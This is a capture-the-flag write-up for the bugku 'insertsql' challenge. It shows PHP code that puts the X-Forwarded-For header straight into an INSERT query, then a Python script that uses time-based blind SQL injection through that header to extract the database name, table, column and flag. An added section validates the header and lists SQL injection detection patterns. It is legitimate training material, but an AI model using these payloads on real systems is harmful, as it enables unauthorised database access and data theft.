  • bugku insertsql

    Challenge link

    0x00 PHP code given by the challenge

    <?php
    error_reporting(0);

    function getIp(){
        $ip = '';
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        }else{
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $ip_arr = explode(',', $ip);
        return $ip_arr[0];
    }

    $host="localhost";
    $user="";
    $pass="";
    $db="";

    $connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

    mysql_select_db($db) or die("Unable to select database");

    $ip = getIp();
    echo 'your ip is :'.$ip;
    $sql="insert into client_ip (ip) values ('$ip')";  // insert the obtained IP into the database (the client-controlled header value goes straight into the query string)
    mysql_query($sql);

    0x01 INSERT SQL injection vulnerability

    The submitted value is inserted into the database.

    Where it typically appears: an e-commerce order-creation interface with an INSERT-type SQL injection vulnerability lets the order amount be modified. Creating an order inserts a row into the database, but here the insert is built as a dynamic query string, so injected data can tamper with the order data.

    The injection point in this challenge is the X-Forwarded-For header.

    0x02 Python script:

    import requests
    import string

    def getdblen(url):  # get the length of the database name
        sql="1'+(select case when(select length(database())={0}) then sleep(4) else 1 end) and '1'='1"
        for i in range(1,50):
            header={'X-Forwarded-For':sql.format(str(i))}
            try:
                requests.get(url,headers=header,timeout=3)
            except requests.exceptions.Timeout:  # only a timeout (sleep(4) fired) counts as a hit; a bare except would also count connection errors
                print("database name len:",i)
                break

    def gettablelen(url):  # get the length of the table name. No output, don't know where the error is, very annoying~~, can't find the error. No output with or without limit
        # limit picks rows out of a multi-row result; limit 1,1 is the single row at the second position (rows are counted from 0)
        sql="'+(select case when(select length((select table_name from information_schema.tables where table_schema=database() limit {0},1))={1}) then sleep(4) else 1 end) and '1'='1"
        for n in range(0,5):
            for i in range(1,20):
                header={'X-Forwarded-For':sql.format(str(n),str(i))}
                try:
                    requests.get(url,headers=header,timeout=3)
                except requests.exceptions.Timeout:
                    print("table %s name len:%d"%(n,i))
                    break

    def getdb(url):
        database_name=''
        sql="1' and (case when (substr((select database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
        # crack the database name character by character; {0} and {1} mark two placeholders filled by the format call below
        for i in range(1,10): # assume the database name is at most 9 characters
            for code in range(32,128): # loop over printable ASCII, matching one character at a time
                header={'X-Forwarded-For':sql.format(i,chr(code))}
                try:
                    requests.get(url,headers=header,timeout=3)
                except requests.exceptions.Timeout:
                    database_name+=chr(code)
                    print(database_name)
                    break
            else:
                return database_name # no character matched at this position, so the name is complete and we exit the loop
        return database_name

    def gettable(url):
        table_name=''
        payload="'+(select case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
        guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  # note: punctuation contains the quote characters, which break the payload's own quoting
        for i in range(1,50):
            #print(i)
            for ch in guess:
                header={'X-Forwarded-For':payload.format(i,ch)}
                try:
                    requests.get(url,headers=header,timeout=3)
                except requests.exceptions.Timeout:
                    table_name+=ch
                    print(table_name)
                    break
            else:
                return table_name # no match at this position: the concatenated name list is complete
        return table_name

    def getcolumn(url):
        column_name=''
        sql="'+(select case when (substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
        #guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
        for i in range(1,20): # substr positions start at 1; the original started at 0, where substr returns '' and nothing can match
            for code in range(32,128):
                payload={'X-Forwarded-For':sql.format(i,chr(code))}
                try:
                    requests.get(url,headers=payload,timeout=3)
                except requests.exceptions.Timeout:
                    column_name+=chr(code)
                    print(column_name)
                    break
            else:
                return column_name
        return column_name

    def getmessage(url):
        message=''
        sql="'+(select case when(substr((select group_concat(flag) from flag)from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
        for i in range(1,35):
            for code in range(32,128):
                payload={'X-Forwarded-For':sql.format(i,chr(code))}
                try:
                    requests.get(url,headers=payload,timeout=3)
                except requests.exceptions.Timeout:
                    message+=chr(code)
                    print(message)
                    break
            else:
                return message
        return message


    if __name__=='__main__':
        url="http://123.206.87.240:8002/web15/"
        print(getdb(url))
        #tablename = gettable(url)
        #print(tablename)
        #columname = getcolumn(url)
        #message=getmessage(url)

        #print(temp.lower())
        #getdblen(url)
        #gettablelen(url)
        #getdb(url)
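Added example, not part of the original writeup or the challenge code: the getIp() function in 0x00 keeps everything before the first comma of X-Forwarded-For, so the time-based payloads the script above sends reach the INSERT untouched. The Python below mirrors that split, applies the check a fix should add (reject anything that is not a valid IP address before the query, alongside a parameterised INSERT), and extracts the payload markers a detection rule can key on. The sample header values are constructed.

```python
import ipaddress
import re

# Constructed sample X-Forwarded-For values: two benign ones, then two
# time-based blind payloads in the style of the writeup's script.
SAMPLE_HEADERS = [
    "203.0.113.5",
    "203.0.113.5, 10.0.0.2",
    "1'+(select case when(select length(database())=5) then sleep(4) else 1 end) and '1'='1",
    "'+(select case when (substr((select group_concat(table_name) from information_schema.tables"
    " where table_schema=database()) from 1 for 1)='f') then sleep(4) else 1 end) and '1'='1",
]

def first_forwarded_value(header):
    """Same logic as the challenge's getIp(): keep the text before the first comma."""
    return header.split(",")[0].strip()

def validated_client_ip(header):
    """Mitigation: only a syntactically valid IP address may reach the INSERT
    (and the INSERT itself should bind the value as a parameter, not build a string)."""
    candidate = first_forwarded_value(header)
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None

# Detection: tokens the time-based probes against this endpoint rely on.
BLIND_SQLI_MARKERS = re.compile(
    r"sleep\s*\(|case\s+when|information_schema|substr\s*\(|'\s*=\s*'", re.IGNORECASE)

def blind_sqli_markers(header):
    """Sorted, whitespace-stripped, lower-cased markers found in one header value."""
    return sorted({re.sub(r"\s+", "", m.group(0).lower())
                   for m in BLIND_SQLI_MARKERS.finditer(header)})

def triage(headers):
    """Split header values into accepted IPs and rejected values with their markers."""
    accepted, rejected = [], []
    for h in headers:
        ip = validated_client_ip(h)
        if ip is None:
            rejected.append((h, blind_sqli_markers(h)))
        else:
            accepted.append(ip)
    return accepted, rejected

if __name__ == "__main__":
    ok, bad = triage(SAMPLE_HEADERS)
    print("accepted:", ok)
    for value, markers in bad:
        print("rejected:", value[:60], "... markers:", markers)
```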

    The code borrows from other people's writeups, with a few ideas of my own added, such as querying the name lengths.

    Summary: I need to improve my scripting skills and study MySQL statements more; several statements failed to inject only because they were wrong.

  • Original article: https://www.cnblogs.com/liqik/p/11025897.html